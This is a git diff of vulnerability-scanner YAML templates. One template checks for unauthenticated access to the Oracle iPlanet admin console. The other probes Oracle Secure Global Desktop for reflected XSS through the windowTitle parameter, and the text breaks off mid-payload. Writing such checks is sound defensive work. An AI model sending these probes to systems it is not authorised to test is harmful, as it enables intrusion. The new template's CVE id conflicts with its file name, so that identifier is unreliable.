/admingui/version/serverConfigurationsGeneral?serverConfigurationsGeneral.GeneralWebserverTabs.TabHref=4 - requests: - method: GET url: >- @@ -22,6 +21,5 @@ requests: StatusCode() == 200 && StringSearch("response", "Admin Console") && StringSearch("response", "serverConfigurationsGeneral") - >- StatusCode() == 200 && StringSearch("response", "Admin Console") && StringSearch("response", "serverCertificatesGeneral") - references: - - link: https://wwws.nightwatchcybersecurity.com/2020/05/10/two-vulnerabilities-in-oracles-iplanet-web-server-cve-2020-9315-and-cve-2020-9314/ + - https://www.cvebase.com/cve/2020/9315 \ No newline at end of file diff --git a/cves/oracle-sgd-xss-cve-2018-19439.yaml b/cves/oracle-sgd-xss-cve-2018-19439.yaml new file mode 100644 index 0000000..9ec3b18 --- /dev/null +++ b/cves/oracle-sgd-xss-cve-2018-19439.yaml @@ -0,0 +1,22 @@ +id: CVE-2018-19349 +info: + name: Oracle SGD XSS + risk: High + +params: + - root: '{{.BaseURL}}/' + +variables: + - endpoint: | + sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp +requests: + - method: GET + url: >- + {{.root}}{{.endpoint}}?=&windowTitle=AdministratorHelpWindow>